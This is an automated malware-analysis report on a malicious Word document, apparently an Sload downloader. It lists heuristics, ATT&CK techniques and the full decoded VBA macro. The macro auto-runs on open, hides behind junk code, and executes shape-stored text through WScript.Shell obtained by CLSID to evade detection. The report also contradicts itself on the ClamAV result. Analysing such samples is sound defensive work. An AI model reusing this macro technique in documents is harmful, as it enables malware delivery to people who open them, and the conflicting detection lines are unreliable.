Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro that uses the AutoOpen function to execute a command. This command invokes cmd.exe with obfuscated arguments that appear to download and execute a second-stage payload from a constructed URL. The macro also attempts to instantiate the dangerous COM class WScript.Shell, further indicating malicious intent.
Heuristics (9)

- ClamAV: Doc.Malware.Sload-6768899-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sload-6768899-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: Set LqfarBBF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lSBsq) (followed by On Error Resume Next)
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: Set LqfarBBF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lSBsq) (followed by On Error Resume Next)
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Sub AutoOpen() (preceded by Attribute VB_Customizable = True, followed by On Error Resume Next)
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9197 bytes |

SHA-256: 7ac558f01ea1d4f4d8537aff78a7dfef4e4fb5dcfb386f2666c857da827f03c8

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 149 of 220 identifiers look randomly generated (e.g. 'AtwGUaJHEhkMnR'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "vvHzpVdQmlPSj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case lHSiIEjEJ
Case 106689022
JkAwSR = Hex(CHcnonO)
VoiZokd = Cos(193760893)
kIorX = 152236150
Case 146777760
dZHLZnmw = Hex(YnRzTf)
mivVkci = Sqr(207880165 / CSng(45341169 - Cos(303879610 - 79268186) + dhikG + Rnd(8156933 - 72282793)))
GKvBwd = Hex(MqMIQcT)
End Select
On Error Resume Next
Select Case uGPztU
Case 80066148
TwAnoFVEa = Hex(pJsajRr)
zjYRSj = Cos(158949450)
SiMKnUzKA = 305204326
Case 295047977
CipluS = Hex(EVTawFd)
dUCfTPv = Sqr(252789547 / CSng(285500423 - Cos(287474754 - 105488610) + VMhalYbO + Rnd(125198942 - 301657600)))
WADTXwDO = Hex(KzUpw)
End Select
Set cACBrcEf = Shapes("AtwGUaJHEhkMnR")
On Error Resume Next
Select Case fmlmWw
Case 284838776
wdMkv = Hex(zwzCFh)
RGFJZVwlL = Cos(73989805)
TmXDAbnQm = 105628658
Case 136942984
mKuZv = Hex(TwfZU)
jfcwdu = Sqr(136714754 / CSng(259871207 - Cos(120778133 - 126999894) + ItuzXP + Rnd(269546996 - 311219670)))
wFTzivB = Hex(rPOuRKXU)
End Select
On Error Resume Next
Select Case TRCZGYIq
Case 278864415
fPpSFjL = Hex(iicWID)
kzwUE = Cos(252112167)
wboAl = 241782525
Case 21543657
mJiDTn = Hex(NSIwU)
jDzJzZW = Sqr(163099183 / CSng(67651671 - Cos(145615829 - 252412413) + ZTOdEvbJQ + Rnd(316297959 - 122387720)))
FjMhljLHR = Hex(PXrqlLj)
End Select
On Error Resume Next
Select Case svIWYGz
Case 59045107
fOYvwidX = Hex(paMCF)
XYRtJA = Cos(138258275)
ERrbUBzu = 40910085
Case 155164512
qljzTWz = Hex(ahqMqqv)
zoEzkKjTd = Sqr(33412843 / CSng(16128483 - Cos(57282106 - 146982061) + uToYO + Rnd(177744907 - 281382074)))
zXJduzO = Hex(AlYCz)
End Select
On Error Resume Next
Select Case vzVnJuf
Case 312510715
GEtEz = Hex(ulWXTFwOD)
sZnVF = Cos(341309453)
aiDMBqwV = 309396274
Case 161495380
iNuzO = Hex(QTFiP)
wjSmRUr = Sqr(168753056 / CSng(24970975 - Cos(44646283 - 109666873) + atmtua + Rnd(9431304 - 158775682)))
vfpGvKiF = Hex(uJKHFcjD)
End Select
dDHLRf = "" + BRnWYSbU + tjFMUO + rhpHPj + cACBrcEf.TextFrame.TextRange.Text + fiVdGi + EQkTIo + cdMsji
On Error Resume Next
Select Case kCfbk
Case 294317110
JtAzQjlZu = Hex(XZBiwCnb)
owEzaoTuJ = Cos(234540993)
JVjjtDSz = 151975382
Case 221438674
HIinLWd = Hex(zrzpEzFw)
JwmcpFi = Sqr(12870099 / CSng(296564319 - Cos(139888679 - 240856071) + kpENMovPm + Rnd(189462999 - 322294993)))
XkzKjb = Hex(oHsoavzR)
End Select
On Error Resume Next
Select Case ticcaKu
Case 287077696
MbvinLuJc = Hex(OHwiwKvI)
RvAWAMPw = Cos(123923334)
hqnzN = 17764142
Case 337814127
tpcNdEZGU = Hex(AdSiBGZzL)
vVYPb = Sqr(52816491 / CSng(310122531 - Cos(284558712 - 176933727) + ibzTB + Rnd(130728763 - 70988708)))
Rwwts = Hex(vpjCpj)
End Select
On Error Resume Next
Select Case TNnZvREPI
Case 41142863
LGdEuFowa = Hex(cYGZt)
BIIjiKk = Cos(126203819)
ZRapb = 64895411
Case 163894775
IWnosb = Hex(kElnr)
hzCqCHzW = Sqr(77823821 / CSng(5439857 - Cos(146509680 - 69963338) + VnNHzzDEz + Rnd(22079052 - 39759468)))
JhDzZZwb = Hex(rRYwYC)
End Select
Set LqfarBBF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lSBsq)
On Error Resume Next
Select Case FzziN
Case 243734976
jNzcti = Hex(HADXPAVYW)
FGFWj = Cos(115178555)
tJadRo = 45778859
Case 84892833
XDbzjqKOd = Hex(uwkSmhcpY)
fwAvm = Sqr(225066432 / CSng(240888853 - Cos(54875134 - 101861368) + MwKRdRwZb + Rnd(104077630 - 320167309)))
tpXOJrnvp = Hex(iFSbDfKwF)
End Select
On Error Resume Next
Select Case DQrXWoHjF
Case 227852834
hLVAGz = Hex(GWLYJ)
tVtLZLRPj = Cos(43945134)
PJwTIQX = 291842291
Case 290513551
doOGO = Hex(IlumiHv)
AuvKuRC = Sqr(6064386 / CSng(30182182 - Cos(294207161 - 239403095) + BjwGnjRpQ + Rnd(217234607 - 201640735)))
KiJil = Hex(wIOSTN)
End Select
On Error Resume Next
Select Case QBNwCWAQ
Case 65362740
nQVmVEvY = Hex(LEQhSSOm)
DrSKwckJh = Cos(188989781)
zuzuEiO = 30322423
Case 122358794
WiWcjizT = Hex(iojIMSNcS)
CMWTukQEW = Sqr(188879811 / CSng(232929535 - Cos(26369709 - 62340469) + GjMviO + Rnd(329247112 - 239650647)))
mwpPmmbr = Hex(vLPaA)
End Select
Const citlbP = 0
On Error Resume Next
Select Case jwiMwS
Case 107200381
TiSBk = Hex(QrzZKWaip)
AphqZFUzt = Cos(232419654)
vaiFo = 97021820
Case 210271065
AtjAbUuw = Hex(KtkAIqMGl)
jONUIBm = Sqr(136803807 / CSng(113397089 - Cos(129486342 - 132695481) + HuzowQp + Rnd(34714082 - 147434178)))
GdnzwJn = Hex(SwDpzWnY)
End Select
On Error Resume Next
Select Case CHpcz
Case 236679346
NkvZmPD = Hex(vjzRpQFAO)
UlaoUhwm = Cos(220324635)
WXiNpk = 279034050
Case 262528533
zljNuQQH = Hex(qkwGbvcwz)
QNbziqW = Sqr(158805557 / CSng(331003561 - Cos(249131549 - 186665267) + aRQQu + Rnd(267242902 - 158055032)))
XDaCwwPP = Hex(mkqmRXWWl)
End Select
On Error Resume Next
Select Case SDDAcZCAt
Case 264062545
HCPMiiJp = Hex(WAJfWztI)
iXJHTIoNV = Cos(438513)
AIqPq = 200659759
Case 237171322
zCdwc = Hex(ZStYicj)
ILQazjHXR = Sqr(56993264 / CSng(59190836 - Cos(231064522 - 258838986) + JuosPp + Rnd(72157320 - 273985578)))
ajitq = Hex(prXaFAfwQ)
End Select
On Error Resume Next
Select Case IWOLfzJ
Case 20437470
kEziC = Hex(ZwzwOV)
GUGjj = Cos(144539995)
bYKjFo = 12099378
Case 329409845
Nnuhl = Hex(rlDtu)
MmYTEFQu = Sqr(30544200 / CSng(312871809 - Cos(110793117 - 259553222) + aLuQZOJbu + Rnd(233785588 - 68838494)))
nREcVj = Hex(bjPmmNAi)
End Select
On Error Resume Next
Select Case zlmso
Case 199065590
HUJwYYLB = Hex(KNMcb)
nScQoIwwi = Cos(35506963)
Achka = 341903551
Case 50623229
NTfcoN = Hex(FhoVqU)
CzTPYpdI = Sqr(159859482 / CSng(205718420 - Cos(281831079 - 119054328) + iUUkNEI + Rnd(91312236 - 190175986)))
qoDaD = Hex(HIOlUa)
End Select
On Error Resume Next
Select Case HnZMhinRk
Case 233461681
nGUnkw = Hex(vwAzwj)
BJMbnJUdW = Cos(64086583)
EwNNSso = 283743450
Case 146545611
MqzAbf = Hex(cqHqpUfV)
qwZwJjK = Sqr(81091076 / CSng(214691539 - Cos(2246847 - 11439174) + dILFMdpS + Rnd(84892047 - 176965475)))
dlBfCk = Hex(disrCr)
End Select
LqfarBBF.Run# dDHLRf, citlbP
On Error Resume Next
Select Case vKprbOsl
Case 203381594
VCLcBRHB = Hex(iAZbjRnl)
jSpMf = Cos(328073300)
RjOwGqbI = 146719873
Case 7524072
EqSEBlc = Hex(oWiJaodjB)
tIXNtk = Sqr(240178619 / CSng(301643513 - Cos(31914199 - 192782238) + YQFirjuqi + Rnd(111920305 - 25450526)))
fJMiXnIc = Hex(awdsC)
End Select
On Error Resume Next
Select Case ULnQjHCk
Case 333193034
QlAssNl = Hex(LmRnTIZw)
AsHVuS = Cos(266710826)
dEhbDG = 257143757
Case 251218450
iWEAMqHds = Hex(Whrirj)
CrrDVSMb = Sqr(98410875 / CSng(57929923 - Cos(30863787 - 61288942) + fiBVi + Rnd(19525726 - 290538601)))
nBzsCC = Hex(kmZpsQ)
End Select
On Error Resume Next
Select Case TJMuV
Case 178742339
cwjFCFY = Hex(viBKDN)
WzStL = Cos(191381702)
IURQmKZt = 311787294
Case 323568830
Iwjdk = Hex(vBFbrVQIv)
nPcbPA = Sqr(267326832 / CSng(274185099 - Cos(82227673 - 260914150) + SOrCnEDv + Rnd(98505983 - 109036895)))
MZzJXMQwB = Hex(rrliS)
End Select
On Error Resume Next
Select Case ODrSwLSvc
Case 12180480
TvcTSGb = Hex(jAfdiu)
YOpfnvfwM = Cos(322100654)
XtFEFzEb = 313218724
Case 83653085
zZQGHGw = Hex(ZIXBmDGz)
bnwPWk = Sqr(229157365 / CSng(225973262 - Cos(68101884 - 184463785) + fZGwivOQP + Rnd(221730088 - 259959417)))
CdWZzrS = Hex(zBqAI)
End Select
End Sub
```